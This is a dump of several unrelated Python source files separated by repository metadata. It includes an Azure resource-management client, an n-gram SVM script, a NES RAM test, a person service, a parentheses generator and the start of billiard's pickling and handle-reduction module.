    :param parent_resource_path: The parent resource identity.
    :type parent_resource_path: str
    :param resource_type: The resource type of the resource.
    :type resource_type: str
    :param resource_name: The name of the resource to get.
    :type resource_name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: GenericResource or ClientRawResponse if raw=true
    :rtype:
     ~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource or
     ~msrest.pipeline.ClientRawResponse
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Construct URL
    url = self.get.metadata['url']
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
        'resourceProviderNamespace': self._serialize.url("resource_provider_namespace", resource_provider_namespace, 'str'),
        'parentResourcePath': self._serialize.url("parent_resource_path", parent_resource_path, 'str', skip_quote=True),
        'resourceType': self._serialize.url("resource_type", resource_type, 'str', skip_quote=True),
        'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
        'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}
    query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

    # Construct headers
    header_parameters = {}
    header_parameters['Accept'] = 'application/json'
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Construct and send request
    request = self._client.get(url, query_parameters, header_parameters)
    response = self._client.send(request, stream=False, **operation_config)

    if response.status_code not in [200]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('GenericResource', response)

    if raw:
        client_raw_response = ClientRawResponse(deserialized, response)
        return client_raw_response

    return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{parentResourcePath}/{resourceType}/{resourceName}'}
def check_existence_by_id(
        self, resource_id, custom_headers=None, raw=False, **operation_config):
    """Checks by ID whether a resource exists.

    :param resource_id: The fully qualified ID of the resource, including
     the resource name and resource type. Use the format,
     /subscriptions/{guid}/resourceGroups/{resource-group-name}/{resource-provider-namespace}/{resource-type}/{resource-name}
    :type resource_id: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: bool or ClientRawResponse if raw=true
    :rtype: bool or ~msrest.pipeline.ClientRawResponse
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Construct URL
    url = self.check_existence_by_id.metadata['url']
    path_format_arguments = {
        'resourceId': self._serialize.url("resource_id", resource_id, 'str', skip_quote=True)
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}
    query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

    # Construct headers
    header_parameters = {}
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Construct and send request
    request = self._client.head(url, query_parameters, header_parameters)
    response = self._client.send(request, stream=False, **operation_config)

    # HEAD semantics: 204 and 404 are both expected answers, anything else
    # is an error.
    if response.status_code not in [204, 404]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    # 204 means the resource exists; 404 means it does not.
    deserialized = (response.status_code == 204)

    if raw:
        client_raw_response = ClientRawResponse(deserialized, response)
        return client_raw_response

    return deserialized
check_existence_by_id.metadata = {'url': '/{resourceId}'}
def _delete_by_id_initial(
        self, resource_id, custom_headers=None, raw=False, **operation_config):
    # Builds and sends the initial DELETE request of the long-running
    # delete-by-ID operation; `delete_by_id` wraps this with an LRO poller.
    # Construct URL
    url = self.delete_by_id.metadata['url']
    path_format_arguments = {
        'resourceId': self._serialize.url("resource_id", resource_id, 'str', skip_quote=True)
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}
    query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

    # Construct headers
    header_parameters = {}
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Construct and send request
    request = self._client.delete(url, query_parameters, header_parameters)
    response = self._client.send(request, stream=False, **operation_config)

    # 200/204 = deleted, 202 = delete accepted and still running.
    if response.status_code not in [200, 202, 204]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    if raw:
        client_raw_response = ClientRawResponse(None, response)
        return client_raw_response
    # Implicitly returns None when raw is False (delete has no body).
def delete_by_id(
        self, resource_id, custom_headers=None, raw=False, polling=True, **operation_config):
    """Deletes a resource by ID.

    :param resource_id: The fully qualified ID of the resource, including
     the resource name and resource type. Use the format,
     /subscriptions/{guid}/resourceGroups/{resource-group-name}/{resource-provider-namespace}/{resource-type}/{resource-name}
    :type resource_id: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: The poller return type is ClientRawResponse, the
     direct response alongside the deserialized response
    :param polling: True for ARMPolling, False for no polling, or a
     polling object for personal polling strategy
    :return: An instance of LROPoller that returns None or
     ClientRawResponse<None> if raw==True
    :rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
     ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Send the initial DELETE; raw=True so the poller below receives the raw
    # HTTP response it needs to track the long-running operation.
    raw_result = self._delete_by_id_initial(
        resource_id=resource_id,
        custom_headers=custom_headers,
        raw=True,
        **operation_config
    )

    def get_long_running_output(response):
        # Delete has no body: only wrap the raw response when requested.
        if raw:
            client_raw_response = ClientRawResponse(None, response)
            return client_raw_response

    lro_delay = operation_config.get(
        'long_running_operation_timeout',
        self.config.long_running_operation_timeout)
    # Polling strategy: default ARM polling, no polling, or a caller-supplied
    # polling object.
    if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
    elif polling is False: polling_method = NoPolling()
    else: polling_method = polling
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
delete_by_id.metadata = {'url': '/{resourceId}'}
def _create_or_update_by_id_initial(
        self, resource_id, parameters, custom_headers=None, raw=False, **operation_config):
    # Builds and sends the initial PUT request of the long-running
    # create-or-update-by-ID operation; `create_or_update_by_id` wraps this
    # with an LRO poller.
    # Construct URL
    url = self.create_or_update_by_id.metadata['url']
    path_format_arguments = {
        'resourceId': self._serialize.url("resource_id", resource_id, 'str', skip_quote=True)
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}
    query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

    # Construct headers
    header_parameters = {}
    header_parameters['Accept'] = 'application/json'
    header_parameters['Content-Type'] = 'application/json; charset=utf-8'
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Construct body
    body_content = self._serialize.body(parameters, 'GenericResource')

    # Construct and send request
    request = self._client.put(url, query_parameters, header_parameters, body_content)
    response = self._client.send(request, stream=False, **operation_config)

    # 200 = updated, 201 = created, 202 = accepted and still running.
    if response.status_code not in [200, 201, 202]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('GenericResource', response)
    if response.status_code == 201:
        deserialized = self._deserialize('GenericResource', response)

    if raw:
        client_raw_response = ClientRawResponse(deserialized, response)
        return client_raw_response

    return deserialized
def create_or_update_by_id(
        self, resource_id, parameters, custom_headers=None, raw=False, polling=True, **operation_config):
    """Create a resource by ID.

    :param resource_id: The fully qualified ID of the resource, including
     the resource name and resource type. Use the format,
     /subscriptions/{guid}/resourceGroups/{resource-group-name}/{resource-provider-namespace}/{resource-type}/{resource-name}
    :type resource_id: str
    :param parameters: Create or update resource parameters.
    :type parameters:
     ~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: The poller return type is ClientRawResponse, the
     direct response alongside the deserialized response
    :param polling: True for ARMPolling, False for no polling, or a
     polling object for personal polling strategy
    :return: An instance of LROPoller that returns GenericResource or
     ClientRawResponse<GenericResource> if raw==True
    :rtype:
     ~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource]
     or
     ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource]]
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Send the initial PUT; raw=True so the poller below receives the raw
    # HTTP response it needs to track the long-running operation.
    raw_result = self._create_or_update_by_id_initial(
        resource_id=resource_id,
        parameters=parameters,
        custom_headers=custom_headers,
        raw=True,
        **operation_config
    )

    def get_long_running_output(response):
        # Called by the poller with the terminal response.
        deserialized = self._deserialize('GenericResource', response)
        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response
        return deserialized

    lro_delay = operation_config.get(
        'long_running_operation_timeout',
        self.config.long_running_operation_timeout)
    # Polling strategy: default ARM polling, no polling, or a caller-supplied
    # polling object.
    if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
    elif polling is False: polling_method = NoPolling()
    else: polling_method = polling
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create_or_update_by_id.metadata = {'url': '/{resourceId}'}
def _update_by_id_initial(
        self, resource_id, parameters, custom_headers=None, raw=False, **operation_config):
    # Builds and sends the initial PATCH request of the long-running
    # update-by-ID operation; `update_by_id` wraps this with an LRO poller.
    # Construct URL
    url = self.update_by_id.metadata['url']
    path_format_arguments = {
        'resourceId': self._serialize.url("resource_id", resource_id, 'str', skip_quote=True)
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}
    query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

    # Construct headers
    header_parameters = {}
    header_parameters['Accept'] = 'application/json'
    header_parameters['Content-Type'] = 'application/json; charset=utf-8'
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Construct body
    body_content = self._serialize.body(parameters, 'GenericResource')

    # Construct and send request
    request = self._client.patch(url, query_parameters, header_parameters, body_content)
    response = self._client.send(request, stream=False, **operation_config)

    # 200 = update finished synchronously, 202 = accepted and still running.
    if response.status_code not in [200, 202]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('GenericResource', response)

    if raw:
        client_raw_response = ClientRawResponse(deserialized, response)
        return client_raw_response

    return deserialized
def update_by_id(
        self, resource_id, parameters, custom_headers=None, raw=False, polling=True, **operation_config):
    """Updates a resource by ID.

    :param resource_id: The fully qualified ID of the resource, including
     the resource name and resource type. Use the format,
     /subscriptions/{guid}/resourceGroups/{resource-group-name}/{resource-provider-namespace}/{resource-type}/{resource-name}
    :type resource_id: str
    :param parameters: Update resource parameters.
    :type parameters:
     ~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: The poller return type is ClientRawResponse, the
     direct response alongside the deserialized response
    :param polling: True for ARMPolling, False for no polling, or a
     polling object for personal polling strategy
    :return: An instance of LROPoller that returns GenericResource or
     ClientRawResponse<GenericResource> if raw==True
    :rtype:
     ~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource]
     or
     ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource]]
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Send the initial PATCH; raw=True so the poller below receives the raw
    # HTTP response it needs to track the long-running operation.
    raw_result = self._update_by_id_initial(
        resource_id=resource_id,
        parameters=parameters,
        custom_headers=custom_headers,
        raw=True,
        **operation_config
    )

    def get_long_running_output(response):
        # Called by the poller with the terminal response.
        deserialized = self._deserialize('GenericResource', response)
        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response
        return deserialized

    lro_delay = operation_config.get(
        'long_running_operation_timeout',
        self.config.long_running_operation_timeout)
    # Polling strategy: default ARM polling, no polling, or a caller-supplied
    # polling object.
    if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
    elif polling is False: polling_method = NoPolling()
    else: polling_method = polling
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
update_by_id.metadata = {'url': '/{resourceId}'}
def get_by_id(
        self, resource_id, custom_headers=None, raw=False, **operation_config):
    """Gets a resource by ID.

    :param resource_id: The fully qualified ID of the resource, including
     the resource name and resource type. Use the format,
     /subscriptions/{guid}/resourceGroups/{resource-group-name}/{resource-provider-namespace}/{resource-type}/{resource-name}
    :type resource_id: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: GenericResource or ClientRawResponse if raw=true
    :rtype:
     ~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource or
     ~msrest.pipeline.ClientRawResponse
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Construct URL
    url = self.get_by_id.metadata['url']
    path_format_arguments = {
        'resourceId': self._serialize.url("resource_id", resource_id, 'str', skip_quote=True)
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}
    query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

    # Construct headers
    header_parameters = {}
    header_parameters['Accept'] = 'application/json'
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Construct and send request
    request = self._client.get(url, query_parameters, header_parameters)
    response = self._client.send(request, stream=False, **operation_config)

    if response.status_code not in [200]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('GenericResource', response)

    if raw:
        client_raw_response = ClientRawResponse(deserialized, response)
        return client_raw_response

    return deserialized
get_by_id.metadata = {'url': '/{resourceId}'}
| [
"[email protected]"
]
| |
eb7ae1ac126c5b743c4c5ef5c4ccf26c00e3fe0b | 6468584be4f1400ca18dabe59a5c0f05e1f45b03 | /dsl/features/create_ngram_matrix.py | 6e9dd4263e7604fd6bf0246dd03e788605d20f6d | [
"MIT"
]
| permissive | juditacs/dsl | 824e04e77d7bf44aab7e0b820b3f36fea9f09e87 | d6212cb2ff0755ceed8f37ee2f80ab47c9dc780c | refs/heads/master | 2021-01-14T13:21:52.215072 | 2020-04-16T09:32:02 | 2020-04-16T09:32:02 | 35,669,552 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,825 | py | from sys import argv, stderr
import cPickle
from featurize import Tokenizer, Featurizer
from dsl.representation.model import Representation
def main():
    """Train and evaluate an SVM on character n-gram features.

    CLI arguments: argv[1] = n-gram order N (default 3),
    argv[2] = training data directory, argv[3] = test data directory,
    argv[4] = top-ngram cutoff (default 40).

    NOTE: Python 2 code (cPickle, xrange, print statement).
    """
    N = int(argv[1]) if len(argv) > 1 else 3
    t = Tokenizer(filter_punct=True, ws_norm=True, strip=True, replace_digits=True)
    f = Featurizer(t, N=N)
    f.featurize_in_directory(argv[2])
    stderr.write('Featurized\n')
    #m = f.to_dok_matrix(docs)
    f.get_correlations()
    stderr.write('Means computed\n')
    f.label_feat_pearson()
    stderr.write('Correlations computed\n')
    cut = int(argv[4]) if len(argv) > 4 else 40
    # Keep only the `cut` best n-grams per the correlation ranking above.
    f.filter_top_ngrams(cut)
    stderr.write('Top ngrams filtered\n')
    f.save_features('train_features')
    mtx = f.to_dok_matrix()
    with open('train_mtx.cPickle', 'wb') as fh:
        cPickle.dump((f.labels.l, mtx), fh, -1)
    stderr.write('Data read\n')
    stderr.write('Trained\n')
    # Re-featurize the test set reusing the frozen training feature dict so
    # that test vectors live in the same feature space as the training data.
    test_f = Featurizer(t, N=N)
    test_f.featdict = f.featdict
    test_f.featdict.freeze_dict()
    test_f.featurize_in_directory(argv[3])
    docs = test_f.filter_ngrams(test_f.docs, f.topngrams)
    test_f.docs = docs
    test_f.topngrams = f.topngrams
    test_f.save_features('test_features')
    test_f.featdict.save('topfeatures')
    test_mtx = test_f.to_dok_matrix()
    with open('test_mtx.cPickle', 'wb') as fh:
        cPickle.dump((test_f.labels.l, test_mtx), fh, -1)
    acc = 0
    stderr.write('Test matrix done\n')
    r = Representation('dummy', 'svm', svm_ktype='svc')
    r.encode(mtx)
    stderr.write('Encoded\n')
    r.train_classifier(f.labels.l)
    # Accuracy: fraction of test rows whose predicted label matches gold.
    for i in xrange(test_mtx.shape[0]):
        gold = test_f.labels.l[i]
        cl = r.classify_vector(test_mtx.getrow(i).todense())[0]
        if gold == cl:
            acc += 1
    print float(acc) / test_mtx.shape[0]
# Script entry point: run the train/evaluate pipeline when executed directly.
if __name__ == '__main__':
    main()
| [
"[email protected]"
]
| |
4f31d3739a8a0169184bb538944118b6f95aec4a | fd4df5cf34f8427153bf01d25c39ded9315b8d6a | /tests/test_ram.py | 7a12aff7cec9d97af7a57edbc2623b3b2f0b1518 | [
"BSD-2-Clause"
]
| permissive | jepebe/nes | 9ac00e89cf474b7811020d18bf7fd8f15b556339 | 79e6ad689473b7a3a4f3b6d7cf2c381220fcf140 | refs/heads/master | 2023-01-05T22:38:30.714836 | 2020-10-26T07:33:10 | 2020-10-26T07:33:10 | 300,615,959 | 1 | 1 | null | 2020-10-26T07:33:11 | 2020-10-02T13:01:36 | Python | UTF-8 | Python | false | false | 567 | py | from nes.bus import Bus
class TestCartridge:
    """Stub cartridge: responds to no address, so all bus traffic hits RAM.

    Both handlers return None, which (per the Bus mapper convention) signals
    that the cartridge does not claim the address.
    """

    def cpu_write(self, addr, value):
        """Ignore CPU writes (fixed: parameter was misspelled `addt`)."""
        return None

    def cpu_read(self, addr):
        """Ignore CPU reads; None lets the bus fall through to RAM."""
        return None
def test_ram():
    """Internal RAM is 2 KB and mirrored every 0x800 up to 0x1FFF."""
    bus = Bus()
    bus.insert_cartridge(TestCartridge())

    # Every cell of the 2 KB window is writable and readable.
    for address in range(0x0800):
        bus.cpu_write(address, 0xFF)
        assert bus.cpu_read(address) == 0xFF

    # A single write is visible at the base address and all three mirrors.
    bus.cpu_write(0x700, 0x7F)
    for mirror_index in range(4):
        assert bus.cpu_read(0x700 + 0x800 * mirror_index) == 0x7F
| [
"[email protected]"
]
| |
af1f62d0bf863e6597fbe007f00340142d4450ce | 16b2c2365eff11f34ae260321e6dde78ab09b45d | /api/api_services/PersonService.py | 14c5f4056460582f3abd2dd4a7f5dc56475455ed | []
| no_license | laken11/TMS | bf941802e350a16db0f2314330ad315e73ce48f0 | c271f2cbb1624ab943c10bacaa6406ec8ca08083 | refs/heads/dev | 2023-04-27T22:03:38.811267 | 2021-05-08T12:06:54 | 2021-05-08T12:06:54 | 362,518,465 | 0 | 0 | null | 2021-05-05T10:07:54 | 2021-04-28T15:27:28 | Python | UTF-8 | Python | false | false | 1,823 | py | from abc import ABCMeta, abstractmethod
from typing import List
from api.api_dto.PersonDto import *
from api.api_repository.PersonRepository import PersonRepository
class PersonManagementService(metaclass=ABCMeta):
    # Abstract service contract for person management; concrete
    # implementations (e.g. DefaultPersonManagementService) delegate to a
    # PersonRepository.

    @abstractmethod
    def create_person(self, model: CreatePersonDto):
        """Create a person object"""
        raise NotImplementedError

    @abstractmethod
    def update_person(self, person_id, model: UpdatePersonDto):
        """Update a person object"""
        raise NotImplementedError

    @abstractmethod
    def list_person(self) -> List[ListPersonDto]:
        """List all person objects"""
        raise NotImplementedError

    @abstractmethod
    def person_details(self, person_id, model: PersonDetailsDto):
        """Details of a person object"""
        raise NotImplementedError

    @abstractmethod
    def update_person_role(self, person_id, model: UpdatePersonRoleDto):
        """Updating a person role"""
        raise NotImplementedError
class DefaultPersonManagementService(PersonManagementService):
    """Repository-backed implementation of PersonManagementService.

    Every operation is a thin delegation to the injected PersonRepository.
    """

    repository: PersonRepository

    def __init__(self, repository: PersonRepository):
        self.repository = repository

    def create_person(self, model: CreatePersonDto):
        return self.repository.create_person(model=model)

    def update_person(self, person_id, model: UpdatePersonDto):
        # BUG FIX: previously called self.update_person(...) recursively,
        # which recursed forever; delegate to the repository like the
        # other methods do.
        return self.repository.update_person(person_id=person_id, model=model)

    def list_person(self) -> List[ListPersonDto]:
        return self.repository.list_person()

    def person_details(self, person_id, model: PersonDetailsDto):
        return self.repository.person_details(person_id=person_id, model=model)

    def update_person_role(self, person_id, model: UpdatePersonRoleDto):
        return self.repository.update_person_role(person_id=person_id, model=model)
"[email protected]"
]
| |
7fc48ac64107c97a8357f111ccd641bcaaf880af | aca01c2d073cc9ca2b71e12b8ed87a13a3d61438 | /design-patterns/src/iterators-ksiazka-adresowa.py | bed9ad1fa41d7eb0c99cdd60435c1395e01f065b | [
"MIT"
]
| permissive | sli1989/book-python | ee2ee0f37b3173b6921db722a4cb2593d6df1f2b | 51ea279bcc26c4b9b8a1d726e2683c019a28d62b | refs/heads/master | 2020-04-15T11:39:07.209256 | 2019-01-06T23:27:55 | 2019-01-06T23:27:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 792 | py | class Kontakt:
def __init__(self, imie, nazwisko, adresy=[]):
self.imie = imie
self.nazwisko = nazwisko
self.adresy = adresy
class Adres:
    """Free-form address record: each keyword argument becomes an attribute."""

    def __init__(self, **kwargs):
        for attribute, content in kwargs.items():
            setattr(self, attribute, content)
# Demo data: one contact with four (NASA-themed) addresses.
kontakt = Kontakt(imie='Pan', nazwisko='Twardowski', adresy=[
    Adres(ulica='2101 E NASA Pkwy', miasto='Houston', stan='Texas',
          kod='77058', panstwo='USA'),
    Adres(ulica=None, miasto='Kennedy Space Center', kod='32899',
          panstwo='USA'),
    Adres(ulica='4800 Oak Grove Dr', miasto='Pasadena', kod='91109',
          panstwo='USA'),
    Adres(ulica='2825 E Ave P', miasto='Palmdale', stan='California',
          kod='93550', panstwo='USA'),
])
# NOTE(review): iterating a Kontakt requires Kontakt.__iter__ (the point of
# this iterators exercise); as originally written the class does not define
# it and this loop raises TypeError — confirm the intended solution.
for adres in kontakt:
    print(adres)
| [
"[email protected]"
]
| |
d8074cdceef3099fac3b9fe5188dce7732392b2d | c8efab9c9f5cc7d6a16d319f839e14b6e5d40c34 | /source/Clarification/Backtracking/生成括号.py | 79c4cbc77e31405a0b2e94b1f993c9dc312741f0 | [
"MIT"
]
| permissive | zhangwang0537/LeetCode-Notebook | 73e4a4f2c90738dea4a8b77883b6f2c59e02e9c1 | 1dbd18114ed688ddeaa3ee83181d373dcc1429e5 | refs/heads/master | 2022-11-13T21:08:20.343562 | 2020-04-09T03:11:51 | 2020-04-09T03:11:51 | 277,572,643 | 0 | 0 | MIT | 2020-07-06T14:59:57 | 2020-07-06T14:59:56 | null | UTF-8 | Python | false | false | 685 | py | # 给出 n 代表生成括号的对数,请你写出一个函数,使其能够生成所有可能的并且有效的括号组合。
#
# 例如,给出 n = 3,生成结果为:
#
# [
# "((()))",
# "(()())",
# "(())()",
# "()(())",
# "()()()"
# ]
class Solution:
    """LeetCode 22: generate all well-formed combinations of n bracket pairs."""

    def generateParenthesis(self, n: int) -> List[str]:
        """Return every valid string made of *n* '(' / ')' pairs.

        Explicit-stack depth-first search over partial strings, tracking
        how many opening and closing brackets have been placed.  A ')'
        may be placed only while fewer have been closed than opened, and
        a '(' only while fewer than *n* have been opened.
        """
        results = []
        # Each entry: (partial string, opens placed, closes placed).
        pending = [('', 0, 0)]
        while pending:
            partial, opens, closes = pending.pop()
            if len(partial) == 2 * n:
                results.append(partial)
                continue
            # Push the ')' branch first so the '(' branch is explored
            # first, matching the recursive DFS output order.
            if closes < opens:
                pending.append((partial + ')', opens, closes + 1))
            if opens < n:
                pending.append((partial + '(', opens + 1, closes))
        return results
"[email protected]"
]
| |
eb7c72bc1dfe900c646c7d26ddc66400e27f3755 | 60f9b5dce4d11f1e89da620915918dacba738b45 | /billiard/reduction.py | 11ea7c4913c98a398df8837bd3ac3dfc3807ca5e | [
"BSD-3-Clause"
]
| permissive | dexter-xiong/billiard | 5e7497a29d14b11b19cab5008110e69d3c9bae19 | 0fedae7cb7c7408a4287e3d161b4f2b63541c279 | refs/heads/master | 2020-12-31T01:36:59.953134 | 2014-12-18T20:58:25 | 2014-12-18T20:58:25 | 33,759,423 | 0 | 0 | null | 2015-04-11T02:25:20 | 2015-04-11T02:25:20 | null | UTF-8 | Python | false | false | 8,976 | py | #
# Module which deals with pickling of objects.
#
# multiprocessing/reduction.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
from __future__ import absolute_import
import functools
import io
import os
import pickle
import socket
import sys
__all__ = ['send_handle', 'recv_handle', 'ForkingPickler', 'register', 'dump']
# True when running under Python 3; selects which ForkingPickler variant below.
PY3 = sys.version_info[0] == 3
# True when fd/handle passing is possible: always on Windows, and on Unix
# only when the socket module exposes SCM_RIGHTS ancillary-data support.
HAVE_SEND_HANDLE = (sys.platform == 'win32' or
                    (hasattr(socket, 'CMSG_LEN') and
                     hasattr(socket, 'SCM_RIGHTS') and
                     hasattr(socket.socket, 'sendmsg')))
#
# Pickler subclass
#
if PY3:
    import copyreg

    class ForkingPickler(pickle.Pickler):
        '''Pickler subclass used by multiprocessing.

        Py3 variant: custom reducers are installed per-instance through
        ``dispatch_table`` (copyreg mechanism) rather than by patching the
        class-level dispatch like the Py2 variant below.
        '''
        # Reducers registered via register(); merged into every instance's
        # dispatch_table at construction time.
        _extra_reducers = {}
        _copyreg_dispatch_table = copyreg.dispatch_table
        def __init__(self, *args):
            super(ForkingPickler, self).__init__(*args)
            # Start from the global copyreg table, then overlay our own.
            self.dispatch_table = self._copyreg_dispatch_table.copy()
            self.dispatch_table.update(self._extra_reducers)
        @classmethod
        def register(cls, type, reduce):
            '''Register a reduce function for a type.'''
            cls._extra_reducers[type] = reduce
        @classmethod
        def dumps(cls, obj, protocol=None):
            # Pickle into memory; returns a memoryview over the buffer.
            buf = io.BytesIO()
            cls(buf, protocol).dump(obj)
            return buf.getbuffer()
        @classmethod
        def loadbuf(cls, buf, protocol=None):
            # NOTE(review): pickle.loads() takes only *data* positionally on
            # Py3; passing ``protocol`` as a second positional argument looks
            # like it would raise TypeError — confirm against upstream billiard.
            return cls.loads(buf.getbuffer(), protocol)
        loads = pickle.loads
else:
    class ForkingPickler(pickle.Pickler):  # noqa
        '''Pickler subclass used by multiprocessing.

        Py2 variant: reducers are installed by copying and patching the
        class-level ``dispatch`` table shared by all instances.
        '''
        dispatch = pickle.Pickler.dispatch.copy()
        @classmethod
        def register(cls, type, reduce):
            '''Register a reduce function for a type.'''
            def dispatcher(self, obj):
                # Translate the reduce() result into a save_reduce call.
                rv = reduce(obj)
                self.save_reduce(obj=obj, *rv)
            cls.dispatch[type] = dispatcher
        @classmethod
        def dumps(cls, obj, protocol=None):
            buf = io.BytesIO()
            cls(buf, protocol).dump(obj)
            return buf.getvalue()
        @classmethod
        def loadbuf(cls, buf, protocol=None):
            # NOTE(review): pickle.Pickler defines no ``load`` method; this
            # presumably relied on Py2 pickle internals — verify upstream.
            return cls.load(buf, protocol)
        loads = pickle.loads
# Module-level alias so callers can write reduction.register(type, fn).
register = ForkingPickler.register
def dump(obj, file, protocol=None):
    '''Replacement for pickle.dump() using ForkingPickler.'''
    ForkingPickler(file, protocol).dump(obj)
#
# Platform specific definitions
#
if sys.platform == 'win32':
    # Windows
    __all__ += ['DupHandle', 'duplicate', 'steal_handle']
    import _winapi
    def duplicate(handle, target_process=None, inheritable=False):
        '''Duplicate a handle. (target_process is a handle not a pid!)'''
        if target_process is None:
            target_process = _winapi.GetCurrentProcess()
        return _winapi.DuplicateHandle(
            _winapi.GetCurrentProcess(), handle, target_process,
            0, inheritable, _winapi.DUPLICATE_SAME_ACCESS)
    def steal_handle(source_pid, handle):
        '''Steal a handle from process identified by source_pid.'''
        # Open the source process, then duplicate-and-close-source so the
        # handle migrates into this process in one step.
        source_process_handle = _winapi.OpenProcess(
            _winapi.PROCESS_DUP_HANDLE, False, source_pid)
        try:
            return _winapi.DuplicateHandle(
                source_process_handle, handle,
                _winapi.GetCurrentProcess(), 0, False,
